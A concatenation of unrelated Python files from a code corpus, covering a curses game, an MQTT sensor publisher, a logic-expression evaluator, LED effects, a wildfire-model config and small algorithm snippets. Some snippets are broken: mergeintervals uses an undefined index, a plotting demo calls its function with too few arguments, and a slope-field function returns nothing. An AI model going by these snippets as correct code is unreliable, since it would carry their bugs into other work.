model = build_model(vocab_size=len(vocab),embedding_dim=embedding_dim,rnn_units=rnn_units,batch_size=BATCH_SIZE)
# First check the shape of the output:
for input_example_batch, target_example_batch in dataset.take(1):
    example_batch_predictions = model(input_example_batch)
    print(example_batch_predictions.shape, "# (batch_size, sequence_length, vocab_size)")
# In the above example the sequence length of the input is 100 but the model can be run on inputs of any length:
model.summary()
######################## Try the model
3f77bb134a0b7c9fa8c02eac1254afab089a0e93 | Python | nrkn/SimpleRL | /python/SimpleRL.py | UTF-8 | 1,370 | 3.296875 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import curses
MAP = [
'#### ####',
'# #### #',
'# #',
'## ##',
' # # ',
' # # ',
'## ##',
'# #',
'# #### #',
'#### ####',
]
KEY_QUIT = ord('q')
DIRECTIONS = {
curses.KEY_UP: (0, -1),
curses.KEY_RIGHT: (1, 0),
curses.KEY_DOWN: (0, 1),
curses.KEY_LEFT: (-1, 0),
}
class BlockedMovement(Exception):
    """Raised when the player tries to move into a non-walkable tile."""
class Game(object):
    """Terminal roguelike: move the '@' around MAP with the arrow keys."""

    def __init__(self, screen):
        # screen: a curses window; (x, y) is the player position (col, row).
        self.screen = screen
        self.x, self.y = 2, 2

    def move_player(self, (dx, dy)):  # Python 2 tuple-parameter syntax
        """Move the player by (dx, dy); raise BlockedMovement on a wall."""
        x, y = self.x + dx, self.y + dy
        if MAP[y][x] != ' ':
            raise BlockedMovement()
        self.x, self.y = x, y

    def main(self):
        """Draw the map, then run the input loop until 'q' is pressed."""
        for row in MAP:
            self.screen.addstr(row + '\n')
        key = None
        while key != KEY_QUIT:
            self.screen.addstr(self.y, self.x, '@')
            key = self.screen.getch()
            try:
                direction = DIRECTIONS[key]
            except KeyError:
                # Not a movement key: ignore it.
                pass
            else:
                # Erase the old position, then attempt the move; a blocked
                # move leaves the player in place.
                self.screen.addstr(self.y, self.x, ' ')
                try:
                    self.move_player(direction)
                except BlockedMovement:
                    pass
if __name__ == '__main__':
    # curses.wrapper sets up/tears down the terminal and passes the screen in.
    curses.wrapper(lambda screen: Game(screen).main())
| true |
c14dedc7a122dfed2206bf21ada4b16c14ff6ce3 | Python | Caatu/RASP-SERVER | /main.py | UTF-8 | 3,815 | 2.640625 | 3 | [] | no_license | #!/usr/bin/python3
import json, time, os, sys
import paho.mqtt.client as mqtt
import getpass
from dotenv import load_dotenv
from callbacks import *
from getsensors import *
from alerts import *
from time import sleep
def initializeConnection(username, password, client_id, broker, port):
    """
    Create client object and initialize the connection with mqtt server.

    Stores the client in the module-level ``client`` global, wires up the
    callbacks, and blocks until either ``connected_flag`` or
    ``bad_connection_flag`` is set by the on_connect callback.

    More about client object:
    http://www.steves-internet-guide.com/client-objects-python-mqtt/
    """
    global client
    mqtt.Client.connected_flag = False # Control Tag (Network loop)
    mqtt.Client.bad_connection_flag = False
    client = mqtt.Client(
        client_id=client_id,
        clean_session=False,
    )
    client.on_connect = on_connect
    client.on_log = on_log
    client.on_message = on_message
    client.username_pw_set(username=username, password=password)
    print("Connecting to broker")
    #try:
    client.connect(broker,port=port)
    #except:
    #    print("Connection failed")
    #    client.bad_connection_flag = True
    client.loop_start()
    # Wait to connection success or error occur
    while not client.connected_flag and not client.bad_connection_flag:
        print("In wait loop")
        time.sleep(1)
    if client.bad_connection_flag:
        # When occur error in connection stop the program
        # TODO: Filter possibles errors in on_conect and print this on log file
        finish()
    print("In Main Loop")
def finish():
    """
    Finish the loop of callbacks from paho-mqtt and exit the program.
    """
    client.disconnect()  # tell the broker we are leaving
    client.loop_stop()   # stop the paho-mqtt network thread
    sys.exit()
def generateObjetc(measurement, unit):
    """
    Serialize a measurement value and its unit into a JSON string.
    """
    return json.dumps({'measurement': measurement, 'unit': unit})
def getMAC():
    """Return the MAC address of the Ethernet interface, or all zeros on failure."""
    try:
        raw = open('/sys/class/net/%s/address' % getEthName()).read()
    except:
        # Any failure (missing interface, unreadable sysfs) yields a null MAC.
        raw = "00:00:00:00:00:00"
    return raw[0:17]
def getEthName():
    """Return the name of the last enx*/eth* network interface, or "None"."""
    # BUG FIX: interface was previously only assigned inside the loop, so
    # when /sys/class/net existed but held no enx*/eth* entry the function
    # raised NameError at the return (which sits outside the try).
    interface = "None"
    try:
        for root, dirs, files in os.walk('/sys/class/net'):
            for dir in dirs:
                if dir[:3] == 'enx' or dir[:3] == 'eth':
                    interface = dir
    except:
        interface = "None"
    return interface
def sendData(topic, jsonObject):
    """
    Publish string to connected client.

    :param topic: MQTT topic path to publish on
    :param jsonObject: JSON-encoded payload string
    """
    client.publish(topic,jsonObject)
    print("Data sent")
def subscribeTopic(topic):
    """
    Subscribe to an topic in connected client.

    :param topic: MQTT topic filter (wildcards such as '#' allowed)
    """
    client.subscribe(topic)
def main():
    """
    Start the script, loading all settings and starting connections.

    Reads broker credentials from the .env file in the working directory,
    connects, then publishes every sensor reading once per second forever.
    UNDER DEVELOPMENT, ONLY TESTS HERE...
    """
    # Loading dotenv data
    envpath = os.getcwd()+"/.env"
    load_dotenv(verbose=True,dotenv_path = envpath)
    username = os.getenv("BROKER-USERNAME")
    password = os.getenv("BROKER-PASSWORD")
    client_id = getpass.getuser()
    broker = os.getenv("BROKER-IP")
    port = int(os.getenv("BROKER-PORT"))
    # Initializing components
    initializeConnection(username,password,client_id,broker,port)
    # Subscribe to receive all messages.... Tests...
    subscribeTopic('/gustavoguerino2@gmail.com/#')
    # Sending data
    # NOTE(review): error is never set inside the loop, so this runs forever;
    # confirm whether a stop condition was intended.
    error = False
    while(not error):
        sensorList = getSensorsList()
        for sensor in sensorList:
            # Topic layout: /<account>/<mac>/<sensor name>/<measurement type>/
            topic = "/gustavoguerino2@gmail.com/{}/{}/{}/".format(getMAC(), sensor['name'], sensor['meassurementType'])
            data = generateObjetc(sensor['meassurement'] ,sensor['meassurementUnit'])
            sendData(topic,data)
        # Check alerts
        compareAlerts(sensorList)
        # Sleep 1 seconds and send data again
        time.sleep(1)
| true |
5f2c258d6410016ffd1ed4092a9e99ef77b09db7 | Python | williamd4112/simple-svm | /plot.py | UTF-8 | 1,038 | 3.078125 | 3 | [] | no_license | import matplotlib.pyplot as plt
import numpy as np
def plot_decision_boundary(func, x_, t_, xo_, to_, xt_, tt_, h):
    """Scatter-plot training points, support vectors and test points.

    :param func: classifier callable (currently unused; the mesh-based
        decision-region rendering is commented out below)
    :param x_, t_: training points (n, 2) and their labels
    :param xo_, to_: highlighted points (drawn as large 'x' markers) and labels
    :param xt_, tt_: test points (small dots) and labels
    :param h: mesh step size used to derive the axis limits
    """
    x_min = x_[:, 0].min()
    x_max = x_[:, 0].max()
    y_min = x_[:, 1].min()
    y_max = x_[:, 1].max()
    xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
    #Z = func(np.c_[xx.ravel(), yy.ravel()])
    # Put the result into a color plot
    #Z = Z.reshape(xx.shape)
    plt.figure(1, figsize=(4, 3))
    #plt.pcolormesh(xx, yy, Z, cmap=plt.cm.Paired)
    # Plot also the training points
    plt.scatter(xt_[:, 0], xt_[:, 1], s=4, c=tt_, edgecolors='k', cmap=plt.cm.Paired)
    plt.scatter(x_[:, 0], x_[:, 1], s=50, c=t_, marker='o', cmap=plt.cm.Paired)
    plt.scatter(xo_[:, 0], xo_[:, 1], s=250, c=to_, marker='x', cmap=plt.cm.Paired)
    plt.xlabel('x1')
    plt.ylabel('x2')
    plt.xlim(xx.min(), xx.max())
    plt.ylim(yy.min(), yy.max())
    plt.xticks(())
    plt.yticks(())
    plt.show()
if __name__ == '__main__':
    # NOTE(review): plot_decision_boundary takes 8 parameters but only 6
    # arguments are passed here, so this demo call raises TypeError.
    # Confirm the intended sample data.
    plot_decision_boundary(None, 0, 0, 255, 255, 10)
| true |
c2515e376f5dec51ac5e3e80a65dbea30ffb81ef | Python | hotoku/samples | /python/asyncio/9.py | UTF-8 | 404 | 3.4375 | 3 | [] | no_license | """
asyncではない関数を並列実行するには、loop.run_in_executorを使う。
https://docs.python.org/ja/3/library/asyncio-eventloop.html
"""
import asyncio
from time import sleep
def f(n):
    """Blocking (non-async) worker: print its id, then sleep one second."""
    print(n)
    sleep(1)
async def main():
    """Run the blocking function f ten times concurrently in executor threads."""
    # get_running_loop() is the supported way to obtain the loop from inside
    # a coroutine; get_event_loop() here is deprecated since Python 3.10.
    # Behavior is unchanged: inside a running coroutine both return the
    # currently running loop.
    loop = asyncio.get_running_loop()
    # Executor=None uses the loop's default ThreadPoolExecutor, so the ten
    # one-second sleeps overlap instead of running serially.
    await asyncio.gather(*[
        loop.run_in_executor(None, f, i) for i in range(10)
    ])


asyncio.run(main())
| true |
f6b19c8c329cd11f96082aabc0470bb4c2af2be2 | Python | Sandy4321/DigitalCircuits | /LogicExpression.py | UTF-8 | 8,734 | 3.390625 | 3 | [] | no_license | __author__ = 'multiangle'
class LogicExpression():
    """Parse and evaluate a Boolean expression over single-letter variables.

    Builds the full truth table and a Karnaugh map (up to 4 variables) on
    construction.
    """

    def __init__(self,expression):
        """
        :param expression: the Boolean expression to analyze
        :return:

        Supported operators:  OR   ->  +
                              AND  ->  * (or simple juxtaposition)
                              NOT  ->  [ ]
                              XOR  ->  #
        ATTENTION: variable names are case-insensitive and are normalized
        to upper case.
        """
        self.variables=[]  # variable (input) names, sorted A-Z
        self.truth_table=None  # truth table: header row + one row per input combo
        self.truth_table_short=None  # [joined input bits, output] per row
        self.karnaugh_map=None  # Karnaugh map dict: {'value', 'l1', 'l2'}
        if expression=='':
            raise ValueError('void string!')
        expression=expression.replace(' ','')
        expression=list(expression)
        # Normalize letters to upper case and collect the variable set.
        for i in range(0,expression.__len__()):
            char=expression[i]
            if ord(char)>=97 and ord(char)<=122:
                char=char.upper()
                expression[i]=char
                if char not in self.variables:
                    self.variables.append(char)
            elif ord(char)>=65 and ord(char)<=90:
                if char not in self.variables:
                    self.variables.append(char)
        self.variables.sort()
        self.expression=''.join(expression)
        self.Generate_Truth_Table()
        self.Generate_Karnaugh_Map()

    def Generate_Truth_Table(self):
        """Evaluate the expression for every input combination."""
        truth_table=[]
        truth_table.append(self.variables+['Y'])
        for i in range(0,2**self.variables.__len__()):
            local_expression=self.expression
            # Binary representation of i, zero-padded to the variable count.
            variable_value=list(bin(i))[2:]
            variable_value=['0']*(self.variables.__len__()-variable_value.__len__())+variable_value
            # Substitute each variable with its '0'/'1' value, then evaluate.
            for x in range(0,self.variables.__len__()):
                local_expression=local_expression.replace(self.variables[x],variable_value[x])
            local_res=self.cal_expression(local_expression)
            truth_table.append(variable_value+[local_res])
        self.truth_table=truth_table
        # Short form: [concatenated input bits, output] per row.
        self.truth_table_short=[[''.join(x[0:x.__len__()-1]),x[x.__len__()-1]] for x in self.truth_table]
        # self.Print_Truth_Table()

    def Print_Truth_Table(self):
        """Pretty-print the truth table as an ASCII grid."""
        lines=self.truth_table.__len__()
        cols=self.truth_table[0].__len__()
        print(('|---')*cols+'|')
        for line in self.truth_table:
            output='|'
            for col in line:
                output+=str(col)+'\t'+'|'
            print(output)
            # print(('|---')*cols+'|')
        print(('|---')*cols+'|')

    def Generate_Karnaugh_Map(self):
        """Arrange the truth-table outputs on a Gray-code-labelled grid."""
        tag_list=[x[0] for x in self.truth_table_short]
        tag_value=[x[1] for x in self.truth_table_short]
        # Row/column labels per variable count (Gray-code order for 3/4 vars).
        if self.variables.__len__()==1:
            label_1=['0','1']
            label_2=['']
        if self.variables.__len__()==2:
            label_1=['0','1']
            label_2=['0','1']
        if self.variables.__len__()==3:
            label_1=['0','1']
            label_2=['00','01','11','10']
        if self.variables.__len__()==4:
            label_1=['00','01','11','10']
            label_2=['00','01','11','10']
        map=[[0 for col in range(label_2.__len__())] for row in range(label_1.__len__())]
        # Each cell's tag is row-label + column-label, looked up in the table.
        for x in range(0,label_1.__len__()):
            for y in range(0,label_2.__len__()):
                tag=''.join([label_1[x],label_2[y]])
                map[x][y]=tag_value[tag_list.index(tag)]
        self.karnaugh_map={
            'value':map,
            'l1':label_1,
            'l2':label_2
        }

    def cal_expression(self,expression):
        """Recursively evaluate a '0'/'1' expression string; returns '0' or '1'."""
        init_stack=[]  # first pass: evaluate parenthesized sub-expressions
        for x in expression:
            if x!=')':
                init_stack.append(x)
            else:
                # Pop back to the matching '(' and evaluate the contents.
                sub_expression=[]
                while(True):
                    item=init_stack.pop()
                    if item=='(':
                        break
                    else:
                        sub_expression.insert(0,item)
                sub_value=self.cal_expression(''.join(sub_expression))
                init_stack.append(sub_value)
        expression=''.join(init_stack)
        init_stack=[]  # second pass: evaluate NOT brackets [...]
        for x in expression:
            if x!=']':
                init_stack.append(x)
            else:
                sub_expression=[]
                while(True):
                    item=init_stack.pop()
                    if item=='[':
                        break
                    else:
                        sub_expression.insert(0,item)
                sub_value=self.cal_expression(''.join(sub_expression))
                # Invert the sub-result.
                if sub_value==0 or sub_value=='0':
                    sub_value='1'
                elif sub_value==1 or sub_value=='1':
                    sub_value='0'
                init_stack.append(sub_value)
        expression=''.join(init_stack)
        # print(expression)
        # Third pass: shunting-yard-style evaluation with AND binding
        # tighter than OR/XOR; adjacent digits imply AND.
        num_stack=[]
        sig_stack=[]
        num_stack.append(expression[0])
        for i in range(1,expression.__len__()):
            if expression[i] in ['0','1']:
                if expression[i-1] in ['0','1']:
                    # Implicit AND between adjacent operands.
                    num_stack.append(expression[i])
                    sig_stack.append('*')
                else:
                    num_stack.append(expression[i])
            else:
                # NOTE(review): `expression=='#'` compares the WHOLE string;
                # this probably should be `expression[i]=='#'`, so a top-level
                # XOR falls through to the plain-push branch below -- confirm.
                if expression[i]=='+' or expression=='#':
                    if sig_stack.__len__()==0:
                        sig_stack.append(expression[i])
                    else:
                        if sig_stack[sig_stack.__len__()-1]=='+' or sig_stack[sig_stack.__len__()-1]=='#':
                            sig_stack.append(expression[i])
                        else:
                            # Reduce pending higher-precedence ops before
                            # pushing the lower-precedence one.
                            while True:
                                a=num_stack.pop()
                                b=num_stack.pop()
                                sig=sig_stack.pop()
                                res=self.logic_cal(a,b,sig)
                                num_stack.append(res)
                                if sig_stack.__len__()==0:
                                    sig_stack.append(expression[i])
                                    break
                                if sig_stack[sig_stack.__len__()-1]=='+' or sig_stack[sig_stack.__len__()-1]=='#' :
                                    sig_stack.append(expression[i])
                                    break
                else:
                    sig_stack.append(expression[i])
        # Final reduction of everything left on the stacks.
        while True:
            if sig_stack.__len__()==0:
                break
            a=num_stack.pop()
            b=num_stack.pop()
            sig=sig_stack.pop()
            res=self.logic_cal(a,b,sig)
            num_stack.append(res)
        return num_stack[0]

    def Plot_Karnaugh_Map(self):
        """Pretty-print the Karnaugh map with its row/column labels."""
        row_num=self.karnaugh_map['l1'].__len__()+1
        col_num=self.karnaugh_map['l2'].__len__()+1
        # print('|'+'---|'*col_num)  # top border of the header row
        content='|'+'\t'+'|'
        for x in self.karnaugh_map['l2']:
            content+=x+'\t'+'|'
        print(content)
        # print('|'+'---|'*col_num)
        for i in range(0,self.karnaugh_map['l1'].__len__()):
            content='|'+self.karnaugh_map['l1'][i]+'\t'+'|'
            for j in range(0,self.karnaugh_map['l2'].__len__()):
                content+=self.karnaugh_map['value'][i][j]+'\t'+'|'
            print(content)
            # print('|'+'---|'*col_num)

    def Equal_To(self,b_expression):
        """Return True when b_expression has the same Karnaugh map as self."""
        cmp_obj=LogicExpression(b_expression)
        if self.karnaugh_map['value']==cmp_obj.karnaugh_map['value']:
            return True
        else:
            return False

    def logic_cal(self,in_1,in_2,sig):
        """Apply one binary operator; sig is '+', '*' or '#'; returns '0'/'1'."""
        if isinstance(in_1,str) or isinstance(in_2,str):
            in_1=int(in_1)
            in_2=int(in_2)
        if sig=='+':
            if in_1==1 or in_2==1:
                return '1'
            else:
                return '0'
        elif sig=='*':
            if in_1==1 and in_2==1:
                return '1'
            else:
                return '0'
        elif sig=='#':
            if in_1==in_2:
                return '0'
            else:
                return '1'
if __name__=='__main__':
    # Demo: the last assignment to x wins; earlier ones are sample inputs.
    # x='([a+c]+[d])(a+bc)([a]+b)'
    # x='[ac][d]+a(b+c)+[a]b'
    x='[c][b][a]+c#b'
    x='[b]c+b[c]+[a][b][c]'
    a=LogicExpression(x)
    # print('|'+'---'+'|'+'---')
    # print('|'+'AB'+'\t'+'|')
    # print('-'+'---'+'-')
    # for x in a.truth_table_short:
    #     print(x)
    # print(a.truth_table_short)
    # a.Plot_Karnaugh_Map()
    # b=LogicExpression('a')
    print(a.karnaugh_map)
    for i in a.karnaugh_map['value']:
        print(i)
8137eae40cade66d01b751000dd8a4f4c87d3303 | Python | wsanchez/sample-klein-app | /src/sample_klein_app/application/test/unittest.py | UTF-8 | 1,385 | 2.71875 | 3 | [] | no_license | """
Extensions to :mod:`twisted.trial.unittest`
"""
from twisted.internet.defer import Deferred, ensureDeferred
from twisted.trial import unittest
__all__ = (
"TestCase",
)
class TestCase(unittest.SynchronousTestCase):
    """
    A unit test. The atom of the unit testing universe.

    Extends :class:`twisted.trial.unittest.SynchronousTestCase` rather than
    the asynchronous :class:`twisted.trial.unittest.TestCase`, because tests
    that are themselves asynchronous cause some known problems, and one
    should be able to unit test code synchronously.
    """

    def successResultOf(self, deferred: Deferred):
        """
        Like the inherited ``successResultOf``, but accepts coroutines as
        well as :class:`twisted.internet.defer.Deferred` s by normalizing
        the argument with ``ensureDeferred`` first.
        """
        return unittest.TestCase.successResultOf(self, ensureDeferred(deferred))

    # NOTE: a failureResultOf override would need the same ensureDeferred
    # normalization if asynchronous failures are ever asserted on.
| true |
248bbe17a6ed4ec00b97c83db17c1d4b5986bc9c | Python | somyungsub/kosta-pythonbasic | /day01/day01_6_1.py | UTF-8 | 223 | 3.8125 | 4 | [] | no_license |
# Demonstrate str.split and str.join.
a = 'a-b-c-d-e-f-g'
print(a.split("-")) # split into a list
print(",".join(a.split("-"))) # join the list back into a comma-separated string
print("".join(a.split("-"))) # join the list back into a string with no separator
print(a)
1cb94fe022a06b11504abe6c7d16151c2c2687d6 | Python | M-Bentley/Lab8 | /lab8.py | UTF-8 | 1,968 | 3.953125 | 4 | [] | no_license | import random
# Simple turn-based monster fight (Python 2 script).
damageByMonster = random.randint(1,35)  # monster's damage for the next hit
personHealth = 100
monsterHealth = 100
punchDmg = 5
swordDmg = 10
fireball = 30
print 'A monster approaches! Prepare to fight!'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'You have 100 health'
print 'The monster has 100 health'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'What attack do you wish to use?'
print '  1 - Punch, 2 - Sword, 3 - Fireball'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
# NOTE(review): this first read is immediately overwritten by the read at
# the top of the loop, so the first input is silently discarded -- confirm.
userInput = int(raw_input())
while(monsterHealth > 0):
    userInput = int(raw_input())
    # NOTE(review): in every branch the monster's damage is re-rolled AFTER
    # being applied, so the printed damage is next turn's roll, not the
    # amount just subtracted -- confirm intended behavior.
    if userInput == 1:
        monsterHealth = monsterHealth - punchDmg
        personHealth = personHealth - damageByMonster
        damageByMonster = random.randint(1,35)
        print 'You strike the monster with your fist!'
        print 'The monster has', monsterHealth, ' health.'
        print 'Ouch! The monster hits you for', damageByMonster, ' damage'
        print 'You have', personHealth, ' health'
    elif userInput == 2:
        monsterHealth = monsterHealth - swordDmg
        personHealth = personHealth - damageByMonster
        damageByMonster = random.randint(1,35)
        print 'You strike the monster with your sword!'
        print 'The monster has', monsterHealth, ' health.'
        print 'Ouch! The monster hits you for', damageByMonster, ' damage'
        print 'You have', personHealth, ' health'
    elif userInput == 3:
        monsterHealth = monsterHealth - fireball
        personHealth = personHealth - damageByMonster
        damageByMonster = random.randint(1,35)
        print 'You strike the monster with a fireball!'
        print 'The monster has', monsterHealth, ' health.'
        print 'Ouch! The monster hits you for', damageByMonster, ' damage'
        print 'You have', personHealth, ' health'
    # Setting health to -100 acts as a sentinel to break the loop condition.
    if personHealth <= 0:
        print 'You died'
        monsterHealth = -100
    elif monsterHealth <= 0:
        print 'It died'
        personHealth = -100
cc9dbf8c013a092e6fe1b9c9bb481b576c5441df | Python | bguest/house-of-enlightenment | /python/effects/debugging_effects.py | UTF-8 | 1,833 | 2.515625 | 3 | [] | no_license | from hoe import color_utils
from hoe.animation_framework import Scene
from hoe.animation_framework import Effect
from hoe.state import STATE
class PrintOSC(Effect):
    """An effect layer that just prints OSC info when it changes."""
    def next_frame(self, pixels, t, collaboration_state, osc_data):
        # Only log on change to avoid printing every frame.
        if osc_data.contains_change:
            print "Frame's osc_data is", osc_data
class MovingDot(Effect):
    """Sweep a fading white dot along the strip in pixel-index order."""

    def __init__(self, spark_rad=8, t=0):
        Effect.__init__(self)
        self.spark_rad = spark_rad  # dot length, in pixels
        self.start_time = t         # time origin for the sweep

    def next_frame(self, pixels, t, collaboration_state, osc_data):
        total = STATE.layout.n_pixels
        # The head advances 80 pixels per second, wrapping at the strip end.
        head = ((t - self.start_time) * 80) % total
        for offset in range(self.spark_rad):
            # Brightness falls off linearly behind the head.
            level = 255 - offset * 128 / self.spark_rad
            pixels[int((head + offset) % total)] = (level, level, level)
class FailureEffect(Effect):
    """Force a failure after the given number of frames (for testing)."""

    def __init__(self, frames=30):
        # BUG FIX: honor the frames argument; it was previously ignored and
        # hard-coded to 30 regardless of what the caller passed.
        self.frames = frames

    def next_frame(self, pixels, now, collaboration_state, osc_data):
        self.frames -= 1
        if self.frames < 0:
            raise Exception("Nobody expects me!")
# FIXME : A little hacky - trying to avoid circular dependencies with generic_effects
from generic_effects import NoOpCollaborationManager
from generic_effects import SolidBackground
# NOTE(review): __all__ here holds Scene INSTANCES (a scene registry picked
# up by the framework), not exported names as __all__ conventionally does.
__all__ = [
    Scene("osc printer", NoOpCollaborationManager(), PrintOSC(), SolidBackground(30, 30, 30)),
    # Not a real effect. Just testing failures in effect code against the gulp server
    # Scene("failquick", NoOpCollaborationManager(), SolidBackground(0, 255, 0), FailureEffect()),
    Scene("bluewithdot", NoOpCollaborationManager(), SolidBackground(0, 255, 0), MovingDot())
]
| true |
2e29009d27298db662ab1143772b0e7371274863 | Python | akhilgeorge005/thesis | /lig_input_data.py | UTF-8 | 6,220 | 2.84375 | 3 | [] | no_license |
from sklearn.ensemble import RandomForestRegressor
def input_data():
    """Return the experiment configuration dictionary for the Liguria region.

    All values are hard-coded; edit this function to configure a run.

    GENERIC INFO
    - the input df is better having columns 'year' (year of fire) and
      'season' (value 1 winter, 2 summer)
    - coordinates must be called x and y
    - in the input df a column named natural_reg can be added with more
      info about the vegetated zones
    - points and fires dataframes must be in .pkl format
    - points_df needs a 'point_index' column
    - for regression, fires_df must have a column called 'fire' describing
      the fire frequency
    - put 1 fold if you want to skip the validation
    """
    # DEFINE CUSTOM MODEL TO INSERT INTO MODEL SELECTION LIST
    # rfr = RandomForestRegressor(n_estimators=750, verbose=2)

    # Renamed the local from `input_data` to `config`: the old name shadowed
    # the function itself.
    config = {
        'region_name': 'LiguriaNew',
        # path of the dem tif file
        'path_dem': '/home/gruppo4/Regioni/Liguria/new_data_32632/dem_100_32632.tif',
        'ntree': 1000,
        # if True the test dataset is created by taking random points
        'random_years': False,
        # starting year of the wildfire dataset
        'year_from': 2007,
        # year the test dataset is built from when random_years is False;
        # otherwise random points are taken among year = last year - year_test
        'year_test': 2015,
        # last year of the time period considered for the wildfires
        'year_to': 2019,
        # output path with the trailing '/'; a new output folder with the
        # experiments will be created inside it
        'data_dir': '/home/gruppo4/Regioni/Liguria/new_data_32632/',
        # True if two different datasets are used: one for training and one
        # for creating the final map
        'two_points_df': False,
        # path of the training dataset
        'training_df_path': '/home/gruppo4/Regioni/Liguria/new_data_32632/points.pkl',
        # path of the dataset for the final susceptibility map
        'all_points_path': '/home/gruppo4/Regioni/Liguria/new_data_32632/points.pkl',
        # path of the fires dataset: make sure it has a year column called 'year'
        'fires_df_path': '/home/gruppo4/Regioni/Liguria/new_data_32632/fires.pkl',

        # --------------- MODEL DATA ---------------
        # columns to be excluded (see the next parameters for the perc columns)
        'excluded_col': ["point_index", 'x', 'y', "row", "col",
                         "veg_freq",
                         'geometry'],
        # if True the perc columns are excluded; if you want to use them
        # instead of the is_veg_ columns, check the next parameter
        'exclude_perc': True,
        # excludes the is_veg columns produced by one-hot encoding; select
        # True when the perc columns are used instead of these
        'exclude_is_veg': False,
        # list of the number of folds per experiment
        'n_fold': [1],
        # if True there is no model selection: the only algorithm used is a
        # random forest with n_estimators = ntree
        'random_forest': True,
        # if False, regression is performed instead of classification
        'classification': True,
        # insert a model defined at the top of this file; None when
        # random_forest is True
        'model_selection': [None],
        # names of the models selected above
        'name_sel_models': [],
        # use tpot to search for the optimal algorithm (set
        # random_forest = True and n_fold = [1] to switch to this option)
        'tpot_sel': False,
        # seasons considered: 1 is winter, 2 is summer
        'season': [1, 2],
        # name describing the experiment (related to the excluded columns)
        'type': 'dem100_1000t_2007-15',
        # number of cells used for the k-fold validation, in the x then y direction
        'tiles_x': 70,
        'tiles_y': 50,
        # if True the prediction on points_df is an average of the
        # predictions on the folds used in the validation phase
        'predict_points_on_fold': False,
        # quantiles for the burned-area analysis
        'quantile': [0.25, 0.5, 0.75, 0.9, 0.95],
        # fires shapefile with the year column, for the quantile burned-area
        # analysis (None if not available)
        'path_fires_shp': '/home/gruppo4/Regioni/Liguria/new_data_32632/fires_y_32632.shp',
        # fires raster file for the same analysis, when no shp file exists
        'path_fires_raster': None,
    }
    return config
| true |
35f370f03ed2d29aafb460a23c101b5ab02c52b0 | Python | sainihimanshu1999/Leetcode---Top-100-Liked-Questions | /mergeIntervals.py | UTF-8 | 326 | 2.75 | 3 | [] | no_license | def mergeintervals(self,intervals):
intervals = sorted(intervals, key= lambda x : x[0])
while i<len(intervals)-1:
if intervals[i][-1]>=intervals[i+1][0]:
intervals[i][-1] = max(intervals[i][-1],intervals[i+1][-1])
del intervals[i+1]
else:
i+=1
return intervals | true |
def sort_by_f(l):
    """Return a copy of `l` ordered by the key x -> x if x < 5 else 5 - x."""
    def key_fn(x):
        if x < 5:
            return x
        return 5 - x
    return sorted(l, key=key_fn)
998fff57bd5514a5db242896d7c32919db328bcb | Python | pjm0/slopefield | /slopefield.py | UTF-8 | 5,360 | 2.78125 | 3 | [] | no_license | #import pygame
from math import *
from random import choice
from time import sleep
import colors
##from screen import *
##screen_x, screen_y = screen.get_width(), screen.get_height()
from geometry import *
from agent import Agent
from avoid_border import avoid_border
SCALE = 15  # pixel length used when drawing field vectors
# Scene positions as (x, y) pixel tuples: the opponent starts at a random
# spot, the ball at a fixed centre point, the goal near the left edge.
opponent = choice(range(150, 774)), choice(range(150, 518))
ball = 512, 384#choice(range(512)), choice(range(screen_y))
goal = 1, 384
def fade(f_1, f_2):
    """Placeholder for blending two fields; not implemented yet (no-op)."""
    pass
def magfield(x, y, scale=1):
    """Field angle at (x, y): the ball-relative bearing mirrored about the
    goal-to-ball direction. `scale` is accepted for signature compatibility
    but unused."""
    mirror_axis = angle_to(goal, ball)
    bearing = angle_to((x, y), ball)
    return 2 * bearing - mirror_axis
def t(point, angle):
    """Build a field like magfield, but mirroring about an arbitrary `angle`
    as seen from `point`. Returns a callable field(x, y) -> angle."""
    def field(x, y):
        return 2 * angle_to((x, y), point) - angle
    return field
def g(x, y, scale=1):
    """Mirror field around the ball, flipped by pi outside the two diagonal
    sectors (behaviour matches the original branch table exactly)."""
    bearing = angle_to((x, y), ball)
    # Lower and upper diagonal sectors keep the raw mirror field.
    if -0.75 * pi < bearing < -pi / 4:
        return magfield(x, y, scale)
    if pi / 4 < bearing < 0.75 * pi:
        return magfield(x, y, scale)
    # The original's remaining two branches (|bearing| < pi/4 and the
    # catch-all) both returned the same flipped value, so they merge here.
    return pi - magfield(x, y, scale)
def h(x, y, scale=1):
    """Offset, half-strength variant of the mirror field."""
    return 1.75 * pi + 0.5 * magfield(x, y, scale)
def f(x, y, scale=1):
    # NOTE(review): work in progress -- this function computes `theta` and the
    # unit vector (vector_x, vector_y) but has no active return statement (the
    # returns below are commented out), so it currently returns None.
    BORDER_WIDTH = 100;
    #*//*
    #*/ double attack_heading
    # Close to the ball and roughly on the ball-goal line: head straight
    # along the goal->ball direction.
    if distance_to_line((x, y), ball, goal) < 20 and distance_to((x, y), ball) < 100:
        theta = angle_to(goal, ball)
##    elif (distance_to_line((x, y), ball, goal) < 200
##          and distance_to((x, y), ball) < 200
##          and distance_to((x, y), goal) < 20 + distance_to(ball, goal)):
##        if add_angles(angle_to(ball, goal), -angle_to((x, y), goal)) > 0:
##            theta = angle_to(goal, ball) + pi/2
##        else:
##            theta = angle_to(goal, ball) - pi/2;
##    elif abs(add_angles(angle_to((x, y), ball), -angle_to(goal, ball))) < pi/2:#########wrong
##        theta = angle_to(ball, goal);
    else:
        # Fall back to the plain mirror field (same formula as magfield).
        theta = -angle_to(goal, ball)+ 2*angle_to((x, y), ball);
    #print(theta)
    vector_x = cos(theta);
    vector_y = sin(theta);
def c(x, y):
    """Constant field: every point gets the angle pi."""
    return pi
def z(f_1, f_2, degree):
    """Blend two angle fields, weighting f_1 by `degree` and f_2 by the
    complement (1 - degree). Returns a callable field(x, y)."""
    def blended(x, y):
        return add_angles_2(f_1(x, y), degree, f_2(x, y), 1 - degree)
    return blended
## if x < BORDER_WIDTH:
## vector_x = max(vector_x, (BORDER_WIDTH - x) / BORDER_WIDTH)
## if x > screen_x - BORDER_WIDTH:
## vector_x = min(vector_x, -(x - (screen_x - BORDER_WIDTH)) / BORDER_WIDTH)
## if y < BORDER_WIDTH:
## vector_y = max(vector_y, (BORDER_WIDTH - y) / BORDER_WIDTH)
